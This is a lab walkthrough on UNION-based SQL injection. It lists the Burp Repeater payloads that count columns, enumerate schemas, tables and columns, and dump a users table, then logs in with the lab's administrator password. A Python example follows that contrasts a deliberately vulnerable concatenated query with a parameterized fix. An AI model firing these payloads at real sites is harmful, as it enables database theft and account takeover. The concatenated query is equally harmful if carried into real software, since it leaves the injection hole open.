SQL injection attack, listing the database contents on non-Oracle databases

Let's filter for Food & Drink.

Since we are proxying the traffic through Burp Suite, we can go to the Proxy > HTTP History tab to view this request.

Let's forward the request to the Repeater for further modification.

Once in the Repeater, let's set the category parameter to the following:

' UNION SELECT 'test'--

Since the application returns an error, we know that the number of columns in the current query is more than 1.

Let's set the category parameter to the following:

' UNION SELECT 'test','test'--

Now that we know the current query has two columns, we can start enumerating the databases.

' UNION SELECT schema_name, NULL FROM information_schema.schemata--

Now let's enumerate the tables present in the public database by setting the category parameter to:

' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema='public'--

Next, we need to find the columns present in the users_bfbtjz table.

We can do that by setting the category parameter to the following:

' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users_bfbtjz'--

We can now retrieve the usernames and passwords from the username_ylkdae and password_sdbuqk columns respectively.

For that we have to set the category parameter to the following:

' UNION SELECT username_ylkdae, password_sdbuqk FROM users_bfbtjz--

We can now log in as the administrator using the following credentials:

Username: administrator
Password: x3lp8yt4oyymkeu9bppm

We have solved the lab.
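
Why the category parameter behaved this way, and the fix, as an added example that is not part of the original write-up or the lab's own code: the same lookup is built once by string concatenation and once as a parameterized query, then fed the payloads used above. Assumptions: SQLite stands in for the lab's database (so the information_schema payloads are left out), and the products table, its columns, the query shape and the stored password are constructed for illustration.

```python
import sqlite3

# Payloads from the walkthrough that SQLite can parse (it has no information_schema).
PAGE_PAYLOADS = [
    "' UNION SELECT 'test'--",
    "' UNION SELECT 'test','test'--",
    "' UNION SELECT username_ylkdae, password_sdbuqk FROM users_bfbtjz--",
]

def build_db():
    """In-memory stand-in for the lab database; every row is constructed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Sample snack', 'Constructed row', 'Food & Drink', 1);
        INSERT INTO products VALUES ('Sample toy', 'Constructed row', 'Toys', 1);
        CREATE TABLE users_bfbtjz (username_ylkdae TEXT, password_sdbuqk TEXT);
        INSERT INTO users_bfbtjz VALUES ('administrator', 'constructed-password');
    """)
    return db

def products_vulnerable(db, category):
    # The parameter becomes part of the SQL text: a quote closes the string
    # literal, and "--" comments out the rest of the original statement.
    sql = ("SELECT name, description FROM products "
           "WHERE category = '" + category + "' AND released = 1")
    return db.execute(sql).fetchall()

def products_parameterized(db, category):
    # The parameter is bound as a value and is only ever compared to category.
    sql = "SELECT name, description FROM products WHERE category = ? AND released = 1"
    return db.execute(sql, (category,)).fetchall()

def run(query_fn, db, category):
    """Return the rows, or the database error text if the statement fails."""
    try:
        return query_fn(db, category)
    except sqlite3.Error as exc:
        return "error: " + str(exc)

if __name__ == "__main__":
    db = build_db()
    for value in ["Food & Drink"] + PAGE_PAYLOADS:
        print(repr(value))
        print("  concatenated :", run(products_vulnerable, db, value))
        print("  parameterized:", run(products_parameterized, db, value))
```

With the concatenated query the one-column payload raises a column-count error and the two-column payloads return injected rows; with the bound parameter every payload is just a category name that matches no product.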